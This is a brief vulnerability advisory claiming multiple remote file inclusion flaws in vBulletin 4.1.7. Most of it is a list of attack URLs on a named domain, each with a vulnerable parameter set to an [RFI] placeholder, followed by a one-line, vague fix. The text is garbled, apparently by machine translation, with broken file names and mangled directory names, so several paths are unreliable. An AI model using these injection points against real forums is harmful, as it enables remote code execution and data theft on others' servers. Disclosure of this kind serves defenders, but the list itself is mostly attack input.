Title: VBulletin 4.1.7 Multiple Remote File Inclusion Vulnerabilities
# Time: 2011-11-05
Author: indoushka (indoushka@hotmail.com) www.2cto.com
######################################## ####################################
Affected Versions:
VBulletin 4.1.7
Vulnerability description:
VBulletin is a powerful and flexible forum program suite that can be customized based on your needs.
VBulletin has multiple Remote File Inclusion vulnerabilities. Attackers can exploit these vulnerabilities to obtain sensitive information or execute arbitrary script code in server processes to control applications or computers.
Example test:
Http://www.bkjia.com/vB1/api. php? Api_script = [RFI]
Http://www.bkjia.com/vB1/payment_gateway.php? Api [classname] = [RFI]
Http://www.bkjia.com/vB1/admincp/cronadmin. php? Nextitem [filename] = [RFI]
Http://www.bkjia.com/vB1/admincp/diagnostic. php? Match [0] = [RFI]
Http://www.bkjia.com/vB1/admincp/diagnostic. php? Api [classname] = [RFI]
Http://www.bkjia.com/vB1/admincp/plugin. php? Safeid = [RFI]
Http://www.bkjia.com/vB1/schemdes/class_block.php? File = [RFI]
Http://www.bkjia.com/vB1/schemdes/class_humanverify.php? Chosenlib = [RFI]
Http://www.bkjia.com/vB1/schemdes/class_paid_subscription.php? Methodinfo [classname] = [RFI]
Http://www.bkjia.com/vB1/utilities des/functions. php? Classfile = [RFI]
Http://www.bkjia.com/vB1/utilities des/functions_cron.php? Nextitem [filename] = [RFI]
Http://www.bkjia.com/vB1/vb. php? Filename = [RFI]
Http://www.bkjia.com/vB1/install/utilities des/class_upgrade.php? Chosenlib = [RFI]
Http://www.bkjia.com/vB1/packages/vbattach/attach. php? Package = [RFI]
Http://www.bkjia.com/vB1/packages/vbattach/attach. php? Path = [RFI]
Fix:
Filter corresponding pages